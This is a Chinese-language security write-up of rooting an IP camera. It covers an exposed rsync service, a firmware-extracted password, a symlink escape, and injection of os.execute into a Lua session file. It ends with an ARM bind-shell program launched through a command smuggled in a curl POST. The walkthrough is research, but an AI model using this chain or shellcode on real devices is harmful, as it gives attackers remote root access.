Author: Ricterz
閑來無事,買了一個某品牌的攝像頭來 pwn 著玩(到貨第二天就忙成狗了,flag 真是立的飛起)。 本想挖一挖二進制方面的漏洞,但是死性不改的看了下 Web,通過一個完整的攻擊鏈獲取到這款攝像頭的 root 權限,感覺還是很有意思的。
0x00
配置好攝像頭連上內網后,首先習慣性的用 nmap 掃描了一下端口。
>>> ~ nmap 192.168.1.101 -n -v --open
Starting Nmap 7.12 ( https://nmap.org ) at 2016-11-01 12:13 CST
Initiating Ping Scan at 12:13
Scanning 192.168.1.101 [2 ports]
Completed Ping Scan at 12:13, 0.01s elapsed (1 total hosts)
Initiating Connect Scan at 12:13
Scanning 192.168.1.101 [1000 ports]
Discovered open port 80/tcp on 192.168.1.101
Discovered open port 554/tcp on 192.168.1.101
Discovered open port 873/tcp on 192.168.1.101
Discovered open port 52869/tcp on 192.168.1.101
Completed Connect Scan at 12:13, 0.35s elapsed (1000 total ports)
Nmap scan report for 192.168.1.101
Host is up (0.051s latency).
Not shown: 996 closed ports
PORT STATE SERVICE
80/tcp open http
554/tcp open rtsp
873/tcp open rsync
52869/tcp open unknown
Read data files from: /usr/local/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.41 seconds除了 554、80,居然發現了一個 873 端口。873 是 rsync 的端口,一個攝像頭居然開啟了這個端口,感覺到十分的費解。 查看了下 rsync 的目錄,發現有密碼,暫時擱置。
>>> ~ rsync 192.168.1.101:: 12:22:03
usb rsync_mgr
nas rsync_mgr
>>> ~ rsync 192.168.1.101::nas 12:22:06
Password:
@ERROR: auth failed on module nas
rsync error: error starting client-server protocol (code 5) at /BuildRoot/Library/Caches/com.apple.xbs/Sources/rsync/rsync-51/rsync/main.c(1402) [receiver=2.6.9]Web 端黑盒沒有分析出漏洞,同樣暫時擱置。 不過暫時發現有意思的一點,這個攝像頭可以掛載 NFS。
0x01
下面著手分析固件。 在官網下載固件后,用 firmware-mod-kit 解包。
/home/httpd 存放著 Web 所有的文件,是 lua 字節碼。file 一下發現是 lua-5.1 版本的。
利用 unluac.jar 解碼得到 Web 源碼。
本以為會有命令執行等漏洞,因為會有 NFS 掛載的過程。但是并沒有找到所謂的漏洞存在。
同時看了下 rsync 配置文件,發現密碼為 ILove****:
但是嘗試查看內容的時候提示 chdir faild,難道說這個文件不存在?
>>> ~/D/httpd rsync rsync@192.168.1.101::nas --password-file /tmp/p
@ERROR: chdir failed
rsync error: error starting client-server protocol (code 5) at /BuildRoot/Library/Caches/com.apple.xbs/Sources/rsync/rsync-51/rsync/main.c(1402) [receiver=2.6.9]突然有個猜想劃過腦海。于是我搭建了一個 NFS 服務器,然后配置好攝像頭 NFS:
再次運行 rsync:
>>> ~/D/httpd rsync rsync@192.168.1.101::nas --password-file /tmp/p
drwxrwxrwx 4096 2016/11/01 12:35:47 .
drwxr-xr-x 4096 2016/11/01 12:35:47 HN1A009G9M12857Bingo!
0x02
rsync 目錄限制在 /mnt/netsrv/nas 了,如何繞過呢。
symbolic link 來幫你_(:3」∠)_
愚蠢的 rsync 并沒有設置 chroot,于是我可以直接創建一個指向 / 的符號鏈接,然后可以訪問任意目錄。
>>> ~/D/httpd rsync --password-file /tmp/p rsync@192.168.1.101::nas/HN1A009G9M12857/pwn/
drwxr-xr-x 216 2016/07/23 11:28:55 .
lrwxrwxrwx 11 2016/07/23 11:28:43 linuxrc
lrwxrwxrwx 9 2016/07/23 11:28:55 tmp
drwxr-xr-x 971 2016/07/23 11:28:56 bin
drwxrwxrwt 10620 1970/01/01 08:00:10 dev
drwxr-xr-x 603 2016/07/23 11:28:55 etc
drwxr-xr-x 28 2016/07/23 11:28:43 home
drwxr-xr-x 1066 2016/07/23 11:28:56 lib
drwxr-xr-x 60 2016/07/23 11:27:31 mnt
dr-xr-xr-x 0 1970/01/01 08:00:00 proc
drwxr-xr-x 212 2016/07/23 11:28:56 product
drwxr-xr-x 3 2016/07/23 11:27:31 root
drwxr-xr-x 250 2016/07/23 11:28:43 sbin
drwxr-xr-x 0 1970/01/01 08:00:01 sys
drwxr-xr-x 38 2016/07/23 11:27:31 usr
drwxr-xr-x 50 2016/07/23 11:28:55 var正當我愉快的打算 rsync 一個 lua 的 shell 到上面時,卻發現除了/tmp/,整個文件系統都不可寫。
嘛,沒關系,我們還有 Web 源碼可以看。
local initsession = function()
local sess_id = cgilua.remote_addr
if sess_id == nil or sess_id == "" then
g_logger:warn("sess_id error")
return
end
g_logger:debug("sess_id = " .. sess_id)
setsessiondir(_G.CGILUA_TMP)
local timeout = 300
local t = cmapi.getinst("OBJ_USERIF_ID", "")
if t.IF_ERRORID == 0 then
timeout = tonumber(t.Timeout) * 60
end
setsessiontimeout(timeout)
session_init(sess_id)
return sess_id
endinitsession 函數創建了一個文件名為 IP 地址的 session,文件儲存在 /tmp/lua_session
>>> ~/D/httpd rsync --password-file /tmp/p rsync@192.168.1.101::nas/HN1A009G9M12857/pwn/tmp/lua_session/
drwxrwxr-x 60 2016/11/01 12:11:12 .
-rw-r--r-- 365 2016/11/01 12:35:55 192_168_1_100.lua同步回來,加一句 os.execute(cgilua.POST.cmd);,然后同步回去。
看起來已經成功執行了命令。但是我嘗試了常見的 whoami、id 等命令,發現并不存在,通過 sh 反彈 shell 也失敗了。感覺很尷尬233333
0x03
通過收集部分信息得知攝像頭為 ARM 架構,編寫一個 ARM 的 bind shell 的 exp:
void main()
{
asm(
"mov %r0, $2\n"
"mov %r1, $1\n"
"mov %r2, $6\n"
"push {%r0, %r1, %r2}\n"
"mov %r0, $1\n"
"mov %r1, %sp\n"
"svc 0x00900066\n"
"add %sp, %sp, $12\n"
"mov %r6, %r0\n"
".if 0\n"
"mov %r0, %r6\n"
".endif\n"
"mov %r1, $0x37\n"
"mov %r7, $0x13\n"
"mov %r1, %r1, lsl $24\n"
"add %r1, %r7, lsl $16\n"
"add %r1, $2\n"
"sub %r2, %r2, %r2\n"
"push {%r1, %r2}\n"
"mov %r1, %sp\n"
"mov %r2, $16\n"
"push {%r0, %r1, %r2}\n"
"mov %r0, $2\n"
"mov %r1, %sp\n"
"svc 0x00900066\n"
"add %sp, %sp, $20\n"
"mov %r1, $1\n"
"mov %r0, %r6\n"
"push {%r0, %r1}\n"
"mov %r0, $4\n"
"mov %r1, %sp\n"
"svc 0x00900066\n"
"add %sp, $8\n"
"mov %r0, %r6\n"
"sub %r1, %r1, %r1\n"
"sub %r2, %r2, %r2\n"
"push {%r0, %r1, %r2}\n"
"mov %r0, $5\n"
"mov %r1, %sp\n"
"svc 0x00900066\n"
"add %sp, %sp, $12\n"
"mov %r6, %r0\n"
"mov %r1, $2\n"
"1: mov %r0, %r6\n"
"svc 0x0090003f\n"
"subs %r1, %r1, $1\n"
"bpl 1b\n"
"sub %r1, %sp, $4\n"
"sub %r2, %r2, %r2\n"
"mov %r3, $0x2f\n"
"mov %r7, $0x62\n"
"add %r3, %r7, lsl $8\n"
"mov %r7, $0x69\n"
"add %r3, %r7, lsl $16\n"
"mov %r7, $0x6e\n"
"add %r3, %r7, lsl $24\n"
"mov %r4, $0x2f\n"
"mov %r7, $0x73\n"
"add %r4, %r7, lsl $8\n"
"mov %r7, $0x68\n"
"add %r4, %r7, lsl $16\n"
"mov %r5, $0x73\n"
"mov %r7, $0x68\n"
"add %r5, %r7, lsl $8\n"
"push {%r1, %r2, %r3, %r4, %r5}\n"
"add %r0, %sp, $8\n"
"add %r1, %sp, $0\n"
"add %r2, %sp, $4\n"
"svc 0x0090000b\n"
);
}編譯:
arm-linux-gcc 2.c -o 2 -static通過 rsync 扔到 /tmp 目錄,然后跑起來:
rsync --password-file /tmp/p 2 rsync@192.168.1.101::nas/HN1A009G9M12857/pwn/tmp/
curl http://192.168.1.101 --data "cmd=wget%20192.168.1.100:2333/`/tmp/2%26`"連接 4919 端口:
Pwned
本文由 Seebug Paper 發布,如需轉載請注明來源。本文地址:http://www.bjnorthway.com/97/
暫無評論